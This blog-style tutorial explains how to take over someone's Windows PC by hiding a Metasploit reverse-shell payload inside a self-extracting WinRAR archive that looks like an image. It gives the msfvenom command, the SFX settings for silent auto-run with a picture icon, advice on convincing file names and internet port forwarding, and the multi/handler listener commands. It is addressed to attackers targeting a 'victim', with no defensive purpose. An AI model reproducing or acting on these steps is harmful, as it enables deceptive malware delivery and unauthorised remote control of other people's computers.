How To Hack Windows PC by Sending An Image Using Kali Linux Metasploit

How To Hack Windows Using an Image :- I already published a post about hacking windows using an excel file, and it was a really great tutorial. You should read that post if you haven’t done that. But now, it’s time for something new, I will tell you how to hack any windows just by sending an image.

In the excel file method, we implemented the code in file and when the victim opened it, code executed too and we got the session in Metasploit.

This method is pretty the same. In this method, we will create payload and then we will implement that payload with an image and create a rar file so that when victim clicks on the rar file, they will see an image and payload or rat (anything that you are using) will be executed in the background.

If you face any problem while doing this, just comment on this post and please do share this post with your friends, if you like it.

You need to have these tools and OS to accomplish this task.


Kali Linux


Winrar for windows (Download)

Let’s start.

How to Hack Windows PC by sending an Image

Step 1- Like always, first of all, we need to create payload. Open Kali Linux terminal and execute below command to create payload.

msfvenom –p windows/meterpreter/reverse_tcp lhost= lport=5555 –o payload.exe is my IP address, 5555 is the port that I want to use and payload.exe is the name of payload file.

You need to customize these options with your IP address (type ifconfig to check your private ip address), port number and name of payload according to you.

If you to hack your target over WAN or the Internet, you need to port forward in router or you can also use to port forward without router.

Step 2- Choose an image that you want to use, an image that you want your victim to see when payload will be executed. For this tutorial, name of my image is picture.jpg

You need to covert this picture to icon. Go to the, upload the image that you want to use, select 64pixels and 8bits options and unselect all other options. Click on Convert button. You will have a new image, rename this. For example, I will just rename this file to picture.ico

We need windows to complete our process and next steps and we also need the WinRAR now, so I hope you have installed WinRAR.

Step 3- In windows, copy and paste the payload.exe file and image file and picture.ico icon file in a new folder. Select both payload and image file (not icon file, only payload and image file) and right-click on payload file, then click on Add to archive option.

All the next steps are really important, so pay attention.

Step 4- You will see a new window named, Archive name and Parameters .

Now you need to customize rar file features in the General tab, rename the file with some more convincing name.

In Archiving options, select create SFX Archive .

In the Compression Method , select Best .

You need to have these settings in the general tab.

Go to the Advanced tab, click on SFX Options button.

Go to the Setup tab, In Run after execution, write the name of payload file and image files like payload.exe and picture.jpg . Have a look at the example below.

Then go to the Modes tab. In Silent Mode , select Hide All option.

Go to the Update tab. In Update Mode , select Extract and Update Files . In Overwrite, select Overwrite all files option.

Then go to the Text and Icon tab. In Load the SFX Icon from the File , select the picture.ico icon file that we created in step 2.

Step 5- Finally, Click on OK button and you will see a new file in the same folder with the name that you used in while creating rar file in step 4.

Send this file to your victim.

Now, whenever your victim will click on it, they will see just an image and payload will be executed in the background and you will get the shell.

Step 6 – Let’s start our listener in Kali Linux. Open terminal and execute following commands step by step in the terminal.


use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp


set LPORT 5555


In lhost option, enter IP address that you used while creating the payload. Anyway, this will start the listener and now all you have to do is wait for the victim to click on the image that you sent.

As soon as your victim clicks on the image, you will get the session.


It was our second tutorial in the series of hacking windows using kali linux and Metasploit. If you want some more, just stay updated by subscribing to our email newsletter, follow us on facebook and twitter.

Share this with your friends if you liked this.